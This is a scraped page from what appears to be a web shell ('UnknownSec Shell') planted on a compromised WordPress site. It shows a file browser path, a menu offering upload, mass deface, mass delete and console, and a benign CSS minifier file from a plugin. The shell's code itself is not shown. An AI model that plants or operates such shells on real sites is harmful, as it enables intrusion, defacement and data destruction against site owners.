shell bypass 403
UnknownSec Shell
:
/
home
/
a
/
k
/
w
/
akwariom
/
www
/
wp-content
/
plugins
/
responsive-menu
/
app
/
Formatters
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
Minifier.php
<?php namespace ResponsiveMenu\Formatters; class Minifier { public static function minify($data) { /* remove comments */ $minified = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $data); /* remove tabs, spaces, newlines, etc. */ $minified = str_replace(array("\r\n","\r","\n","\t",' ',' ',' '), '', $minified); /* remove other spaces before/after ; */ $minified = preg_replace(array('(( )+{)','({( )+)'), '{', $minified); $minified = preg_replace(array('(( )+})','(}( )+)','(;( )*})'), '}', $minified); $minified = preg_replace(array('(;( )+)','(( )+;)'), ';', $minified); return $minified; } }
© 2026 UnknownSec